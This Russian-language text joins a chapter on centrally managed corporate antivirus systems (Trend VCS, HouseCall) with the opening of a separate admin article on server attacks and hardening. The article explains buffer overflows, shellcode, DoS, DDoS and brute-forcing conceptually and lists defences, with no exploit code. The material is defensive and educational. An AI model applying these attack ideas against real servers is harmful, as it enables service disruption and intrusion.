Так как корпоративная сеть может быть очень разветвленной и насчитывать тысячи компьютеров, объединенные в сотни доменов, консоль должна предоставлять не только средство просмотра древовидной структуры сети, но и средства прямого поиска рабочих станций по их имени, по имени рабочей группы пользователей или домена.

Что же касается остальных элементов пользовательского интерфейса, то здесь применяются обычные диалоговые окна со стандартными или специально разработанными элементами управления - кнопки, списки, флажки, поля ввода текстовой информации и т.п.

Процесс начальной установки

Администратор антивирусной защиты запускает программу установки консоли дистанционного управления и контроля, с помощью которой выполняются все остальные операции по установке, обновлению и эксплуатации системы антивирусной защиты. В частности, на один из серверов корпоративной сети устанавливается антивирусный сервер, выполняющий координирующие и управляющие функции.

В небольших сетях администратор может при помощи консоли создать на сервере локальной сети каталог централизованной установки антивирусов, а затем запустить (или подготовить задание для отложенного запуска) процесс установки антивирусов на все рабочие станции и серверы сети.

В более крупных сетях компаний, имеющих удаленные филиалы, администратор при помощи консоли создает несколько каталогов централизованной установки (например, по одному каталогу на каждую удаленную сеть). Далее администратор подготавливает задания для установки антивирусов на все рабочие станции сети. Установка выполняется в каждом удаленном филиале из своего каталога централизованной установки, что сокращает сетевой трафик между филиалами. Для сокращения времени установки антивирус устанавливается сразу на все рабочие станции одновременно.

Обновление антивируса и антивирусной базы данных

Эта операция выполняется администратором антивирусной защиты со своей рабочей станции при помощи консоли управления и контроля.

Если создано несколько каталогов централизованной установки, то администратор настраивает их репликацию. При необходимости обновления программных модулей антивируса или антивирусной базы данных администратор обновляет содержимое только одного, главного каталога централизованной установки. Содержимое реплицируемых каталогов обновляется автоматически по заранее созданному расписанию.

Заметим, что если корпоративная сеть подключена к Интернету, то содержимое главного каталога централизованной установки может обновляться автоматически с сайта антивирусной компании по расписанию, заданному администратором. В том случае, когда такого подключения не предусмотрено, администратор должен обновлять главный каталог централизованной установки вручную.

Управление работой антивирусных программ

При помощи консоли централизованного управления и контроля администратор антивирусной защиты может удаленно со своей рабочей станции настраивать режимы работы антивирусов, установленных на рабочие станции и серверы, а также определять режимы работы служебных сервисов системы антивирусной защиты.

Используя заранее определенные учетные записи одного или нескольких корпоративных доменов, консоль может подключаться к программе-агенту, работающей на всех компьютерах сети. Посредством стандартного оконного интерфейса администратор может изменить любые параметры работы антивирусов, установленных на выбранных компьютерах, для выбранных групп пользователей или для выбранных доменов. Изменение параметров может быть выполнено немедленно или оформлено как задание, запускаемое в заданное время.

Кроме того, администратор может задать расписание антивирусных проверок, выполняемых методом сканирования каталогов рабочих станций и серверов.

Сбор и просмотр информации о работе антивирусной защиты

Система дистанционного управления и контроля обеспечивает сбор, протоколирование и просмотр информации о работе антивирусной защиты. За централизованной сбор информации отвечает серверный модуль системы антивирусной защиты, установленный на одном из серверов корпоративной сети (этот сервер выбирается администратором).

Вся собранная информация становится доступной через консоль управляющей программы на рабочей станции администратора антивирусной защиты.

На рис. 4-3 мы показали процесс передачи информации из локальных журналов антивирусных программ, установленных на рабочих станциях и серверах сети, в общий журнал, расположенный на антивирусном сервере. Здесь же показано, что администратор антивирусной защиты может просматривать общий журнал со своей рабочей станции при помощи консоли.

Рис. 4-3. Управляющая консоль администратора антивирусной защиты

Сбору и протоколированию подлежит следующая информация:

• время и дата установки/обновления программных модулей антивируса с указанием версии этих модулей;
• время и дата обновления антивирусной базы данных с указанием ее версии;
• информация о версии операционной системы, установленной на рабочих станциях и серверах сети, типе процессора, расположении системных каталогов операционной системы и т.д.;
• информация о версии антивируса, установленного на рабочих станциях и серверах сети;
• информация об учетных записях, использованных на рабочей станции для доступа к каталогу централизованной установки с целью установки или обновления антивируса и антивирусной базы данных;
• информация о расположении централизованного каталога установки, использованного для установки или обновления антивируса и антивирусной базы данных;
• информация о полном пути к локальным файлам протокола, расположенных на рабочих станциях и серверах сети, и их содержимое;
• информация об учетных записях, используемой управляющей консолью для доступа к ресурсам рабочих станций и серверов сети при установке, обновлении антивируса и антивирусной базы данных, а также при получении информации о работе антивируса;
• конфигурация и режимы работы антивируса (использование эвристических методов, список проверяемых типов файлов, действия при обнаружении вирусов и т.п.);
• информация, имеющая отношение к работе антивируса, такая как название обнаруженного вируса, дата обнаружения, предпринятые действия, результат лечения и т.п.

Полученная информация записывается в системный журнал сервера, отвечающего за централизованный сбор сведений о работе системы антивирусной защиты.

С помощью консоли управления администратор может получить разнообразные табличные отчеты, преобразовав их при необходимости в формат Microsoft Excel. Это могут быть, например, такие отчеты, как:

• отчеты о выполнении установки или обновления антивируса и антивирусных баз данных;
• отчеты об обнаружении вирусов на выбранных рабочих станциях, на рабочих станциях групп пользователей и доменов;
• отчеты, позволяющие отслеживать время и направление распространения тех или иных вирусов;
• отчеты об использовании учетных записей, предназначенных для управления работой антивирусной системой;
• отчеты об изменении настроек и режимов работы антивирусной системы

Сигнальное информирование

Когда антивирусная программа находит на рабочей станции пользователя зараженный файл в процессе сканирования, выполняемого в рамках задания или инициированного антивирусным монитором, она извещает об этом пользователя (отображая сообщение на экран его рабочей станции), а также антивирусный сервер.

Далее антивирусный сервер оповещает о возникновении события администратора защиты и других лиц в соответствии с настройками, заданными при установке системы антивирусной защиты. При этом антивирусный сервер отправляет сообщение по корпоративной сети, а также (если это указано администратором) по сети пэйджинговой связи, по электронной почте или по сети SMS (рис. 4-4).

Кроме того, сообщение о возникновении события записывается в главный журнал, расположенный на антивирусном сервере.

С помощью управляющей консоли администратор антивирусной защиты может определить список событий, о возникновении которых необходимо экстренно информировать пользователей и администраторов. Это могут быть, например, такие события, как:

• обнаружение вирусов;
• невозможность успешного обновления программных модулей антивирусов или антивирусных баз данных;
• ошибки в работе программных средств антивирусной защиты (особенно те, что могут привести к аварийному отключению антивирусной защиты);
• невозможность локального протоколирования событий из-за переполнения локального журнала событий или по другим причинам;
• изменения в конфигурациях и режимах работы антивирусов, которые потенциально снижают уровень или надежность защиты.

Сообщение о возникновении таких событий в зависимости от настроек, выполненных администратором, может передаваться

• пользователю, на рабочей станции которого произошло событие (например, обнаружен вирус);
• одному или нескольким администраторам, отвечающим за работу сети или за работу средств антивирусной защиты;
• руководителю компании или любым другим лицам, список которых был заранее определен администратором.

Рис. 4-4. Передача сообщения о вирусном заражении рабочей станции

Сообщение передается как стандартными широковещательными средствами операционной системы (текст сообщения, переданного подобным образом, появляется на экране адресата в небольшом диалоговом окне), так и дополнительными средствами, перечисленными ниже:

• через электронную почту с применением протокола SMTP;
• через почтовую службу MHS (в сетях NetWare);
• на один или несколько алвавитно-цифровых пэйджеров с использованием протокола Alphanumeric Input Protocol (IXO/TAP) или на цифровые пэйджеры;
• через систему передачи коротких сообщений SMS.

Консольная программа управления и контроля позволяет назначать событиям различные сообщения. Таким образом, администратор может сам определить тексты сообщений.

Заметим, что для передачи сообщений на пэйджер или для передачи сообщений SMS антивирусная система связывается через модем с соответствующей службой, работающей в автоматическом режиме. Эти службы доступны не везде, поэтому способ передачи сообщений через электронную почту является более универсальным, чем передача на пэйджер или на мобильный телефон через систему SMS.

Для передачи сообщений в пэйджинговые службы или службы автоматической передачи сообщений SMS нужен модем. Этот модем может быть подключен как к серверу, играющему роль центра сбора и обработки информации о работе антивирусной защите, так и к любому другому компьютеру корпоративной сети. При настройке системы передачи сообщений администратор должен указать, к какому компьютеру подключен модем.

Для передачи сообщений через электронную почту с протоколом SMTP можно использовать корпоративный почтовый сервер или сервер, расположенный у провайдера Интернета. Если локальная сеть подключается к Интернету при помощи модема, то для передачи сообщений система антивирусного управления и контроля устанавливает соединение самостоятельно без вмешательства оператора.

В Интернете также существуют разнообразные шлюзы, позволяющие переадресовывать сообщения электронной почты на пэйджер или на мобильный телефон (в виде сообщений SMS). Следует заметить, однако, что все подобные российские шлюзы работают в экспериментальном режиме, поэтому их надежная работа не гарантируется.

Что же касается времени, необходимого на прохождение сообщения электронной почты через шлюз и сеть SMS на мобильный телефон, то практические испытания показали, что в Москве оно меняется в пределах от нескольких секунд до нескольких часов.

Многоуровневые системы с Web-интерфейсом

Архитектура многоуровневых систем с Web-интерфейсом предполагает использование Web-сервера в качестве ядра системы. Задачей этого ядра является, с одной стороны, организация диалогового интерактивного взаимодействия с пользователем, а с другой - с программными модулями той или иной системы.

Заметим, что сегодня Web-технологии широко применяются для решения таких административных задач, как контроль и диагностика оборудования корпоративных серверов, управление серверами электронной почты и другими устройствами и системами, подключенными к Интернету или к корпоративным интрасетям.

С помощью обычного браузера системный администратор или инженерный персонал может, например, получить обширную диагностическую информацию о работе аппаратного обеспечения серверов производства компании Compaq. Это такая информация, как журналы ошибок, сообщения о потенциально возможных отказах оборудования, температура центральных процессоров, температура внутри корпуса и блоков питания, скорость вращения вентиляторов и т.п.

Преимущества такого подхода заключаются в унифицировании способов управления различными системами сети, а также в отсутствии необходимости устанавливать на рабочую станцию администратора какие-либо управляющие программы или консоли. Кроме того, администрирование может выполняться с любого компьютера сети, а если сеть подключена к Интернету, то из любого места земного шара, где есть Интернет и компьютер с браузером.

Для защиты управляющей информации при ее передаче по Интернету или корпоративной интрасети применяются протоколы SSH или другие аналогичные средства (например, собственные защищенные модификации протокола HTTP).

Архитектура системы Trend Virus Control System

Рассмотрим архитектуру системы Trend Virus Control System, построенную на базе Web-технологий. Эта система позволяет полностью управлять и контролировать работу корпоративной системы антивирусной защиты с одной рабочей станции через браузер, даже если отдельные фрагменты сети находятся в разных странах или на разных континентах.

На один из серверов корпоративной сети устанавливается Web-сервер, роль которого обычно играет Microsoft Internet Information Server версии 4.0 или 5.0. Этот сервер входит в состав операционной системы Microsoft Windows 2000 Server и может быть установлен в операционную систему Microsoft Window NT версии 4.0 с бесплатного пакета Microsoft Option Pack for Windows NT.

Специальное серверное Web-приложение Trend VCS Server, работающее на этом Web-сервере, взаимодействует с модулем управления и контроля антивирусной системы, а также с программными агентами, установленными на всех компьютерах сети и не имеющими собственного пользовательского интерфейса.

Взаимодействие осуществляется с использованием безопасного протокола HTTP, разработанного в Trend Micro. Кроме того, для ограничения доступа к серверу IIS и приложению Trend VCS Server применяется парольная защита.

На рис. 4-5 мы показали структурную схему системы антивирусной защиты с Web-интерфейсом.

Рис. 4-5. Антивирусная система с Web-интерфейсом

Эта схема аналогична схеме, показанной на рис. 4-1, однако администратор антивирусной защиты управляет ее работой через браузер, а не через консольное приложение.

На рабочих станциях устанавливается антивирус (PC-cillin, Server Protect, InterScan VirusWall, ScanMail и т.д.). Этот антивирус управляется антивирусным сервером через агента.

На компьютере, играющем роль антивирусного сервера, устанавливается Web-сервер Microsoft Internet Information Server. Специальное Web-приложение, работающее на этом сервере, управляет антивирусным сервером. Оно также предоставляет администратору пользовательский интерфейс для управления системой антивирусной защиты.

По запросу администратора антивирусной защиты, выполняемому через браузер, это приложение инициирует выполнение таких операций, как:

• создание каталогов централизованной установки;
• подготовка и запуск заданий на репликацию каталогов централизованной установки;
• подготовка и запуск заданий на установку антивирусных программных модулей и антивирусных баз данных;
• выполнение настройки режимов работы антивирусных программ, установленных на рабочих станциях и серверах корпоративной сети;
• отображение различного рода журналов и отчетов, отражающих работу системы антивирусной защиты, а также выполнение запросов информации по этим отчетам;
• контроль версий операционных систем, антивирусных программ и антивирусных баз данных, установленных на всех компьютерах сети.

Таким образом, для управления всему антивирусными средствами, установленными в любом месте корпоративной сети, администратор может использовать браузер.

Этот браузер может быть запущен на любом компьютере сети, поэтому отсутствует необходимость в установке каких-либо административных приложений или аплетов. Это упрощает задачу управления работой антивирусных средств, так как она может быть выполнена не только с рабочей станции администратора, но и с любой другой рабочей станции сети. Находясь, например, в командировке в одном из филиалов компании, администратор в состоянии полностью контролировать работу системы антивирусной защиты, как будто бы он сидел за своим рабочем столом в центральном офисе.

С целью обеспечения максимальной независимости от компьютерных платформ сервер Trend VCS Server и клиентское приложение написаны на языке программирования Java и других языках, применяющихся для разработки приложений Интернета.

Что же касается извещений о возникновении событий в корпоративной системе антивирусной защиты, то такие извещения передаются программами-агентами серверу Trend VCS Server и рассылаются по электронной почте, по пэйджинговым сетям, через системы SMS и т.п.

Система HouseCall

Помимо классической антивирусной защиты при помощи антивирусных программ, запускаемых на рабочих станциях, Trend Micro предлагает технологию сканирования файлов на предмет нахождения вирусов при помощи специально разработанного антивирусного элемента управления ActiveX.

Такой элемент управления ActiveX располагается на корпоративном сервере Web и доступен через браузер. Когда пользователь хочет запустить антивирусное сканирование файлов или каталогов, расположенных на его рабочей станции, он при помощи браузера открывает соответствующую страничку корпоративного Web-сервера. При этом происходит автоматическая загрузка антивирусного элемента управления ActiveX в память рабочей станции пользователя.

После завершения загрузки пользователь может работать с антивирусным элементом управления ActiveX через окно браузера, при этом пользовательский интерфейс аналогичен пользовательскому интерфейсу обычной антивирусной программы (рис. 4-6).

Пользоваться системой HouseCall очень просто. Пользуясь древовидным списком каталогов, нужно выбрать каталоги и файлы, подлежащие проверке, отметив соответствующие флажки. Далее следует щелкнуть кнопку SCAN, после чего будет запущен процесс сканирования. Если при этом дополнительно отметить флажок Auto Clean, программа предпримет попытку удалить тело вируса из зараженных файлов.

Результаты сканирования появятся в отдельном окне. Пользователю будет предложено выполнить попытку удаления тела вируса из зараженных файлов или стереть зараженные файлы.

Рис. 4-6. Антивирусная система HouseCall

К достоинствам данного подхода можно отнести отсутствие необходимости в установке антивирусной программы на рабочую станцию пользователя. Когда пользователю нужно проверить файл, он просто запускает браузер, загружает в него нужную страницу корпоративного Web-сайта и запускает сканирование.

Что же касается недостатков, то данная технология не предполагает наличия антивирусного монитора, проверяющего все файлы в момент обращения к ним. Поэтому, на наш взгляд, она может рассматриваться лишь как дополнительная.

Система HouseCall по своему принципу действия коренным образом отличается от системы антивирусной проверки, созданной на сервере ДиалогНауки. Вместо того чтобы передавать файлы по одному на сервер и проверять антивирусом, система HouseCall устанавливает на компьютер пользователя антивирусный модуль, выполненный в виде элемента управления ActiveX. Будучи загруженным один раз с сервера Trend Micro, этот модуль может по запросу пользователя проверять все файлы, хранящиеся на его компьютере. Эти файлы не передаются через Интернет, а исследуются локально, поэтому процесс не отнимает много времени.

В данной статье хотелось бы собрать некоторые виды атак на сервера и средства защиты сервера от хакеров. На тему безопасности написано немерено книг и статей. Упор данной статьи сделан на базовые ошибки администраторов и решения по их устранению. После прочтения этой статьи и проверки собственного сервера администратор так же не сможет спать спокойно, он сможет только сказать я сдал "кандидатский минимум".

Помните администраторы три пословицы,
нет! лучше распечатайте их и повесьте в на своем рабочем месте перед глазами:
"Безопасность - это процесс ",
"Когда админу нечего делать, он занимается безопасностью ",
"Безопасность определяется по самому слабому звену "
Статья ориентирована на админов *nix + Apache + PHP + Perl + (MySQL | PostgreSQL) и защите серверов от удаленных атак, для остальных админов статья, я надеюсь, будет пищей для размышлений.
В разных книгах есть различные классификации атак хакеров, я введу свое деление на два условных класса ВСЕХ атак, разгруппирую их:

• Атака на сервисы, которые уязвимы и доступны через Интернет

Чтобы понять мое деление, представьте есть вымышленный скрипт, который удаленно атакует Апач на 80 порту и в результате атаки Апач завершает свою работу и вы остаетесь без своего сайта, так как некому выдавать веб-странички. Вашему почтовому серверу sendmail отправили в качестве параметра для VRFY 1000 символов, а не короткое имя пользователя, sendmail не ожидал такого развития событий и закрылся, оставив вас без почты. Общий смысл атак этого условного класса, в том, что эксплуатируется какая-либо уязвимость приложения. И тут три пути -

• путь1) приложение упадет и сервис будет не доступен, ситуация DoS;
• путь2) приложение начнет захватывать ресурсы и истощив их, сделает DoS;
• путь3) приложению скормят шелкод и выполнится код атакующего;

Это всё атаки на сервис (п.п1) и лечатся они только одним способом: админ оперативно узнает от разработчика о наличии уязвимости и обновляет данную программу.

Атака по пункту 2 - это когда, динамический сервис, реализованный на некотором языке программирования, допускает получение параметров и, не проверяя их, выполняет. Например, с помощью браузера атакующий, ползая по сайту под управлением Апач, ищет уязвимости в самом сайте и эксплуатируя их, получает желаемое. Написанный на языке Tcl, бот для модерирования канала IRC сервера принимает запросы от пользователя (номер нового анекдота, дату дня для вывода погоды) и хакер, воссоздавая работу программного кода бота (reverse engineering), конструирует запросы, которые не были учтены автором бота.

Спросите как это? тогда вам точно нужна это статья. Так или иначе, чуть ниже все будет раcписано.

Атака на уязвимые сервисы и сам сервер

В данный раздел я отнес все атаки, чей удар приходится на систему и сервисы. Часто такие атаки возможны из ошибок в реализации программы, такие как переполнение буфера (buffer overflow). Если кратко, то это выглядит так, допустим в плохо написанном фтп сервере есть массив (буфер) для имени пользователя на определенное количество символов (к примеру 10), а получает такой фтп сервер 100 символов от недоброжелателя, если в коде фтп сервера такая ситуация не проверяется, то возникает переполнение буфера.

Что же полезного хакерам дает переполнение локального буфера? Можно перезаписать адрес возврата на злонамеренный код. Удаленно это позволяет выполнить произвольный код на целевой системе, локально, если программа запущена под root"ом, это позволит получить привилегии администратора системы. Код, вызывающий переполнение буфера и выполняющий действия для хакера, называют шелкодом (shell code). Написание шелкода это непростая задача и требует от хакера знаний ассемблера, что подразумевает профессионализм в данной области.

Защита от атак на уязвимые сервисы и сам сервер

• Обновление . Необходимо научится обновлять систему целиком и следовательно уметь
  "строить мир и ядро" для *nix, обновлять через пакетную систему Linux и уметь нажимать кнопку Обновить в Windows Update для лицензионной MS Windows. Для админов FreeBSD нужно уметь ставить софт, используя порты. Так вы будете плыть вместе с разработчиками, а не против них.

  Админам MS Windows нужно привыкать и чаще использовать формат дистрибутива MSI, который настоятельно рекомендуется Microsoft и поддерживает обновление старого пакета новым. Чтобы вы не делали на своем сервере, задайте себе вопрос, если появится новая версия этой программы, как легче обновить ее? Вы должны создать такое решение, которое вы полностью контролируете, да бывают проекты со своими разработками или патчами, но если ваши разработки требуют заморозки нужных вам приложений на определенной версии и вы не можете свои патчи применить к новой системе - ГРОШ цена такому решению!

  Сделаю тут лирическое отступление и расскажу, как мне пришлось ломать себя. Начитавшись в Интернете статей, которые начинаются обычно так "скачайте исходник и поставьте его make install". И что дальше? Новую версию как будете ставить? Держать старую версию, чтобы в ней сделать make (de|un)install? А в новой снова make install? Эти вопросы мне задавал мой друг Дмитрий Дубровин, когда мы начинали осваивать FreeBSD. Я стал понимать, что он прав, и, по крайней мере, для Фри такой путь не годится и, не следуя пути разработчиков FreeBSD, я себе только всё усложнял.

  Теперь освоив FreeBSD, когда парой команд скачиваются новые исходники для ядра Фри и всей системы, затем пара команд создают новый мир и ядро, а потом обновляются порты и приложения в системе, ты начинаешь понимать мощь *nix систем. Трудно передать гордость, которую испытываешь, когда обновляешь сервер с FreeBSD из старой ветки в текущую, перестроение мира системы, когда система сама себя компилирует из новых исходников (похоже как Мюнхаузен себя за волосы вытягивал) и все что до обновления работало, также работает "без напильника".

  Как вы уже поняли, нужно обязательно подписаться на рассылки безопасности от разработчиков того софта, который поддерживает ваш бизнес и обновляться периодически. Обновление всего и вся должно быть отточено и поставлено на рельсы.

• Security tuning . Большинство серверных операционных систем идут не достаточно настроенными, по-умолчанию, для работы в агрессивной "химической" среде Интернет. Чтобы хакеры "не нахимичили" на вашем сервере нужно произвести тюнинг безопасности, а именно прочитать рекомендации производителя операционной системы по безопасности. Админы *nix систем могут вызвать man security и, прочитав советы разработчиков, делать сказку былью. Но какая бы ни была операционная система нужно тщательно тестировать работу сервера и сервисов после тюнинга безопасности.
• Файрвол . Настроенный файрвол, который был проверен вами лично с помощью сканеров портов типа nmap и сканеров уязвимостей, если есть вывод от данных программ, то все ли вы понимаете о чем идет речь? При настройке файрвола помните, что существуют пути обхода его правил. Например, есть локальная сеть защищенная файрволом, выставив флаг запрещения фрагментированности пакета, можно при определенных ситуациях достигнуть адресата в локальной сети. Или частая ошибка администратора, излишнее доверие к исходящим пакетам собственного сервера.

  Представьте реальную ситуацию, вражеский код пытается инициировать соединение с хостом хакера-хозяина, а у вас правило в файрволе "от меня в интернет все разрешено". Составляя правила для файрвола, нужно полностью представлять всю картину сетевого общения ваших сервисов между собой и удаленными клиентами.

• Система обнаружения вторжений . Файрвол можно представить в виде каменных стен у рыцарского замка. Воздвигнул раз и сидишь внутри - сухо и комфортно. А что если кто-то уже из пушки проверяет прочность стен? Может уже нужно выглянуть из замка и навалять люлей кому-то? Чтобы знать, что происходит за стенами замка, те что снаружи, нужно на сервере иметь систему обнаружений вторжений (IDS). Если у вас будет такая система на базе понравившегося вам пакета, то если кто начнет палить из nmap-пушки, то вы будете в курсе, и атакёр тоже будет в курсе "что вы в курсе".
• Анализ нестандартных ситуаций . В многочисленных журналах в системе часто мелькают надписи "error: not open file /etc/passwd" или "access denied". Это маленькие звоночки, которые звонят о некорректно настроенном приложении, которое не может что-то, где-то прочитать, а может это не звоночек, а набат, который бьет тревогу о хакере, который на половине пути.

  В любом случае админ должен знать о таких вещах. Для облегчения труда админа созданы программы, которые проанализируют журналы на появление интересных фраз и отправят по почте администратору отчет. Не брезгуйте такой возможностью, такие программы сравнимы со стражниками, которые проверяют на доверенном пути, а все ли себя ведут так как предписано?

• Уберите версии программ . Уберите баннеры у ваших сервисов. Нет не те баннеры, которые вы показываете на своем сайте, а те строки что выдают ваши программы в приветствиях при подсоединении или в выводе ошибок. Не нужно светить версиями своих программ, хакеры по версиям ищут в Интернете доступные программы, эксплуатирующие ту или иную уязвимость (эксплойты - exploit).

  Тут единого нет решения, например если вы ставите из портов некую программу, то не пишите make install clean, так без вас все скачается, с компилируется и поставится. Лучше сделайте make fetch; make extract; потом зайдите в подкаталог files и там в исходниках можно подправить версию программы или выдать ее за другую и потом уже только make install clean.

  Апач очень информативен не к месту и еще светит версиями системы, PHP, Perl, OpenSSL. Отключается безобразие указанием директив в httpd.conf ServerSignature Off ServerTokens Prod. В Интернете можно найти помощь при подмене баннеров на любую программу. Цель одна - лишить атакующего ценной информации. Глядя на свой список сервисов, доступных из Интернета, спросите себя не выдает ли он лишней информации о себе и хранимой им информации.

  Например, DNS сервер bind может разрешать "перенос зоны" и ваши компьютеры с их IP и доменными именами будут доступны всем, а это плохо. Проверьте сами различными сканерами свой сервер и внимательно прочтите их результат работы. При замене баннера программы, советую вставить не случайный текст, а предупреждение об ответственности и о том, что действия журналируются. Так как были инциденты, когда хакера освобождали в зале суда, так как на взломанном фтп сервере была надпись "Welcome! Добро пожаловать!".

• Правило необходимого минимума . Минимизируйте доступные сервисы для Интернета. Отключайте ненужное, так как нельзя взломать то, что отключено. Частая ошибка, например, когда MySQL сервер, работающий в паре с Apache на одной машине, настроен так, что доступен удаленно на своем стандартном порту 3306. Зачем? Дайте команду netstat -na | grep LISTEN и дайте себе ответ: вы знаете какие программы на каком интерфейсе и какой порт используют? Вы контролируете ситуацию? Хорошо если так.
• Много сильных и разных паролей . Часто в видео по хаку или рассказах хакеров о взломе, мелькает фраза "хорошо что у админа был один пароль на админку, который также подошел к ssh и ftp". Я надеюсь это не про вас. Отсюда правило: пароли на разные сервисы должны быть разными и не меньше 16 символов. Пусть записаны на бумажку, если боитесь забыть (в этом месте меня убивают специалисты по безопасности), но это лучше, чем ваш пароль дешифрует за несколько минут удаленный атакёр, так как маленькая длина пароля и похожесть на словарное слово позволили это сделать.

  Разные пароли на разные сервисы легко сделать если сервисы будут авторизовать не как системных пользователей в базе /etc/passwd, а как виртуальных в своих собственных планарных или СУБД базах. Не храните пароли на серверах в файле password.txt ко всем ресурсам, к которым вы как админ имеете доступ.

• Ограничение . Все ваши службы на сервере должны работать от разных ограниченных учетных записей (account) и никогда не работать от учетной записи root. Поверьте, если доберутся до повышения привилегий от ограниченной учетной записи до статуса рута (uid=0, gid=0), вас спасет отсутствие в вашей обновленной системе известных дыр.

  Кстати, многие админы забывают такую вещь, зачем, например, учетным записям для работы Apache и MySQL иметь доступ к shell! Ведь это можно отключить и вместо shell указать /bin/false. Ну-ка, честно, проверьте на своем подотчетном сервере ваши учетные записи к программам и скажите, если я не прав. В ваших SQL базах ограничивайте аккаунты минимально необходимыми привилегиями. Не давайте привилегии FILE, когда вызывается только SELECT.

• Всех в тюрьму! Обучитесь работе с песочницами (sandbox) или тюрьмами (jail) и запускайте приложения в этих изолированных комнатах, это затруднит взлом всего сервера. Если используете виртуализацию, то можно разнести службы по разным гостевым операционным системам.
• Эшелонированная оборона. Есть возможность что-то запретить несколькими путями в разных местах - сделайте это. НИКОГДА не думайте - это я запретил тут, там запрещать лишнее.

Подробнее об атаках на уязвимые сервисы и сам сервер.

• Атака DoS (Отказ в обслуживании) - атака, чья цель забить какой-либо ограниченный ресурс сервера (интернет канал, оперативную память, процессор и тд и тп), так чтобы сервер не смог обслужить легитимных пользователей. Образно говоря, представьте что вам позвонил домой злоумышленник и молчал в трубку и так продолжалось весь вечер. Вам все это надоело и вы отключили телефон, а утром узнали, что пропустили важный звонок вашего шефа. Вот аналогия из реальной жизни атаки DoS.

  В реальной жизни DoS часто выглядит так, из-за ошибки в программе, использование процессора подскакивает и долго держится у отметки 100%, а атакёр периодически использует данную дыру в программе. Криво написаное приложение может исчерпать всю оперативную память. Или "почтовая бомба" в виде сильно сжатого в архиве файла с множеством знаков [пробел], которого распакует для проверки антивирус и распакованный огромный файл переполнит раздел жестком диске на сервере или/и вызовет перезагрузку сервера.

  Защита от атак DoS:

  • Обновление программы, которой манипулируют для атаки DoS
  • Настроить квотирование ресурсов для учетной записи от которой работает данная программа. *nix системы позволяют настроить процент использования процессора, оперативной памяти, кол-во порождаемых процессов, открытых файлов и т.д. и т.п.
  • Настройте логирование в программе и постарайтесь найти атакера-кукловода и заблокировать его в файрволе.
  • Настройте программу как советует разработчик, гуру, по статьям в Интернете, если вы оказались в такой ситуации.
• DDoS (тот же DoS, но вас атакуют с нескольких компьютеров-зомби, под руководством
  атакующего). DDoS разрушителен и их применяют только те вандалы, которые имеют стада зомбированных машин и будут требовать деньги за прекращение атаки или нанесение ущерба вашему бизнесу, чтобы пользователи, не достучавшись до вашего сервера, ушли к конкуренту. DDoS атаки не применяют хакеры, чья цель интелектуальный взлом вашего сервера, да-да ваш сервер это "загадка", которую хотят "разгадать".

  Как защитится от DDoS? Если будете надеяться на собственные силы и средства, то можно, автоматизируя работу скриптами выуживать IP адреса из различных логов и заносить в запрещающие правила файрвола. Так, например, поступил автор статьи "Есть ли жизнь под DDoS"ом?" в журнале Хакер. Блокируйте сети атакеров в файрволе, урон от DDoS можно уменьшить, если прочесть статьи по настройке ваших программ и выполнить эти инструкции. Например, для Apache есть множество статей как настроить его для минимизации урона от DDoS.

  Защита от атак DDoS:

  • Если DDoS направлен на приложение, попытайтесь в логах найти отличия атакеров от легитимных пользователей, и автоматизируя скриптом, заносите в правила файрвола в deny
  • Если DDoS направлен на систему (например, атака по ICMP протоколу), автоматизируя скриптом, заносите в правила файрвола в deny
  • Настроить квотирование ресурсов для учетной записи от которой работает данная программа. *nix системы позволяют настроить процент использования процессора, оперативной памяти, кол-во порождаемых процессов, открытых файлов и тд и тп
  • Настройте программу как советует разработчик, гуру, по статьям в Интернете, если вы оказались в такой ситуации
  • Обратитесь к вашему вышестоящему провайдеру, чтобы он помог чем смог. Напишите жалобу на abuse@хозяин_сетей_откуда_атакуют.домен. Это поможет частично разрушить сеть атакера, пусть понесет урон, ему это деньги стоит. Испытаете моральное удовлетворение.
  • Познакомьтесь с mod_security для Apache, это прекрасное средство поможет вам в некоторых ситуациях.
• Атака bruteforce пароля. Тут дыры в программах не виноваты, просто грубо подбирают пару логин/пароль. Кто оставлял сервер с настроенным ssh, но забывал ограничить доступ по ssh с определенных IP и с определенными логинами (директива в ssh_config AllowUser), тот наверняка видел в логах попытки перебора пароля маша:пароль_маши.

  Защита от bruteforce пароля:

  • Ограничивайте кол-во попыток неудачных логинов/паролей
  • Если приложение позволяет, то настройте увеличение времени перед новой попыткой логин/пароль.
  • Если с приложением должен работать узкий круг людей, создайте такое правило и ограничьте им

Атака через динамическое содержимое сервиса

Данный вид атак часто происходит на связку Apache + (PHP | PERL) + (MySQL | PostgreSQL) для мира *nix и IIS + ASP + Microsoft SQL Server для мира MS Windows с помощью простого браузера, но это только частный случай, который просто чаще используется из-за популярности web. В данной связке языками программирования являются ASP, PHP, Perl, SQL поэтому их часто будут использовать хакеры для составления своих деструктивных конструкций.

НО самое главное следует уяснить, что таких связок сервис + поверх них динамический контент на языках программирования множество и следовательно все они под прицелом хакеров. Например вот такой неполный список:

• Веб-сервер + CGI скрипты
• Древняя связка ныне не употребляющаяся - Apache + PHF (именно P H F) скрипты
• IIS + сервер приложений ColdFusion
• Механизм SSI (Server Side Includes)

Далее, речь пойдет большой частью о web-hack`е, но не забывайте о том, что все ниже описанное справедливо и для других связок сервис + динамический контент. Слова разные, а суть одна. Сегодня хакеры браузером атакуют web, завтра клиентом R против сервиса Z. Веб-сервер, сам будучи связан с базами данных и с многочисленными языками программирования, стал платформой для атак такого рода.

Смысл всех атак такого рода сводится к тому, чтобы пытаться с помощью браузера обследовать сайт на поиск ошибок в скриптах, обслуживающих динамическое содержимое (content) сайта.

Отсюда вывод - взлом сайта через атаку на web, на котором лежат только статические html-страницы, ссылающиеся только друг на друга, НЕВОЗМОЖЕН. Атаки через ваш Web-сайт появились, когда люди захотели больше интерактивности и добавляли оную через языки программирования и базы данных.

Хакеры сёрфя по сайту, особое внимание обращают на скрипты, которым передается какой-либо параметр. А что если автор скрипта не проверяет что именно передается в качестве значения параметра?

Общие решения для админа от атак на динамическое содержимое сервиса (Web-сайт, как частный случай)

• Обновление . Мы уже об этом говорили, но, если вы используете стороннюю наработку (движки форумов, галерей, чатов и тд и п), то получайте сообщения об уязвимостях и латайте дыры. Мнение хакеров таково, если портал работает с финансами и их оборотом, то на таком портале не желательно наличие чьих либо разработок, кроме собственных. Конечно подразумевается, что разработку собственных движков на сайт писали кодеры, которые умеют безопасно программировать и имеют понятие об угрозах в Интернете.
